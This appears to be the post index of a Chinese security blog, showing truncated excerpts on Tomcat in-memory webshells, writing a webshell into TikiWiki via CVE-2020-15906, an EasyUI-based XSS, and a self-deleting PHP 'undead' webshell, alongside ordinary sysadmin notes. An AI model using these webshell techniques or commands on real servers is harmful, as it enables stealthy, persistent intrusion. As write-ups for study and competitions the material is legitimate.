漏洞

漏洞

7 篇文章

工具

工具

4 篇文章

笔记

笔记

8 篇文章

WriteUp

WriteUp

0 篇文章

tomcat-servlet型内存马
2025-08-27 1.6k 字 6 分钟

tomcat-servlet型内存马

其实写完listener型内存马之后就去看servlet内存马了。但是太复杂,没看懂,护网一开就搁置了。 servlet是什么servlet就是实际处理业务的代码。像什么登录注册增删改查都是在servlet里写,然后web.xml里绑定一个url。 当然实际业务里都不写web.xml了。看眼自动生成的HelloServlet就知道,都是直接用注解: 12345678910111213141516171819202122232425262728package org.example.demo3;import java.io.*;import jakarta.servlet.http.*;impo
ez自动签到
2025-07-08 907 字 4 分钟

ez自动签到

ez要证书,证书以前免费,现在要积分申请了。积分还不能充值,只有签到和交poc能获得积分。poc交一个才10-20,一个月的证书都要50积分了,所以只能签到。但是天天签到太麻烦了,所以写了个脚本挂着。 去云码注册个账号,加客服扫码白嫖300积分,够用好长时间的了。 然后写个crontab挂服务器上就行了。最好挂俩账号,一个号俩月60积分,换个证书50积分,两个号轮着用。 crontab -e 10 9 * * * cd /checkin;python3 ez_checkin.py>>checkin.log 2>&1 ez_checkin.py: 1234567891
tomcat-listener型内存马
2025-05-26 1.1k 字 5 分钟

tomcat-listener型内存马

Listener型内存马不像Filter型那么复杂。Listener型内存马只涉及一个变量applicationEventListenersList。 tomcat有一堆listener,其中ServletRequestListener是监听http请求的,最适合做内存马。 准备环境和Filter型内存马一样新建项目,然后写一个正常的listener。 123456789101112131415161718192021package org.example.demo3;import jakarta.servlet.ServletRequestEvent;import jakarta.servl
tomcat-filter型内存马
2025-05-13 3.4k 字 16 分钟

tomcat-filter型内存马

内存马是什么简单说就是没有文件落地的webshell。 常规的java webshell都是上传一个jsp文件,访问这个jsp文件的路径执行命令。但是这样做查文件很容易查出来,文件一删webshell就没了。 内存马是在内存里的,可以访问到但找不到对应路径的文件,后缀也不一定是jsp。更隐蔽,更难排查。 Filter型内存马内存马有很多种实现方式,filter型内存马是通过filter实现的内存马。 filter是在请求被servlet处理之前执行的一段程序,可以对请求进行拦截、修改。通常用来实现一些业务逻辑之外的功能,比如日志记录、全站加密、权限校验等。 通过修改存储filter的变量,把w
tikiwiki写马
2025-04-14 773 字 4 分钟

tikiwiki写马

CVE-2020-15906 vulhub/tikiwiki/CVE-2020-15906/README.zh-cn.md at master · vulhub/vulhub · GitHub 比赛遇见个tikiwiki,byd执行不了几条命令就崩,写马还写不进去,各种转义转着转着就崩了,比如这个python poc.py 127.0.0.1:8080 / 'echo "\<?php${IFS}?\>">shell.php',这里空格会截断,转义就崩,用IFS也崩。比赛的时候没给我
借助EasyUI框架xss
2025-04-07 447 字 1 分钟

借助EasyUI框架xss

今天遇见一个破站,又是关键词过滤又是html解析器过滤的,完了前端还写的稀烂,输个引号就闭合,输个尖括号后半段html属性都当文本渲染了。怎么看怎么像有xss。 其中有个接口传了个Id,返回了一个html页面。后来一看是打开的新的iframe。这个接口的Id直接拼接到Easy UI的DataGrid组件里的参数里去了。类似下面这种 123456789<table class="easyui-datagrid" style="width:400px;height:250px" data-options="url:'http://x
git走代理
2025-03-28 136 字 1 分钟

git走代理

github国内连不上,git clone用不了,以前都是直接下载zip,但这样更新不好更新。 1git config --global https.proxy http://127.0.0.1:7890 socks5也可以换成http,具体情况看端口开的是什么代理 尽量用http,别用socks5,socks5 DNS不走代理,DNS给域名封了socks5连不上 https.proxy是对所有https协议的链接使用代理,http.proxy是对http协议的链接使用代理,但github一般都是https 查看代理:git config --global --get https.proxy
Let's Encrypt证书快速配置
2025-03-28 203 字 1 分钟

Let's Encrypt证书快速配置

当自己的网站需要https的时候,就要申请证书。很多地方都可以申请免费证书,Let’s Encrypt就是其中之一。 用certbot自动申请,安装certbot 123apt-get updateapt-get install certbotapt-get install python-certbot-nginx 如果已经在**/etc/nginx/**里配置好了http站点,直接执行: 1certbot --nginx -d <example.com> <example.com>替换为实际的域名 等一会儿显示Successfully
php不死马
2025-03-11 1.4k 字 5 分钟

php不死马

老爹还有一件事:高贵的马儿驱除体内一切外力,不论怎么删除它都会死而复生 不死马是什么一个经典的不死马是这样的: 123456789101112<?php ignore_user_abort(true);# 忽略用户连接,连接断了也不停止执行 set_time_limit(0);# 脚本最大执行时间(秒),默认是30秒,设为0永不超时 unlink(__FILE__);# 删除此文件,可选,不写会留下这个文件容易被查到 $file = 'test.php'; $code = '<?php if(md5($_GET[&quot
爬虫收集影画
2025-03-08 1.8k 字 8 分钟

爬虫收集影画

博客之前一直用的随机图api,虽然省心,但是加载慢,而且加载的角色都不认识。发现绳网情报站有绝区零所有角色的影画,所以写个爬虫全都抓下来当封面用。中间遇到好多新技巧,记录一下。 分析来源https://baike.mihoyo.com/zzz/wiki/ 先分析页面,打开影画页面,复制影画展示3的图片url,发现是这样的: 1https://act-upload.mihoyo.com/nap-obc-indep/2024/11/06/76099754/93171af7d069601a30c8129ebbfaff34_7755247229681328322.png?x-oss-process=i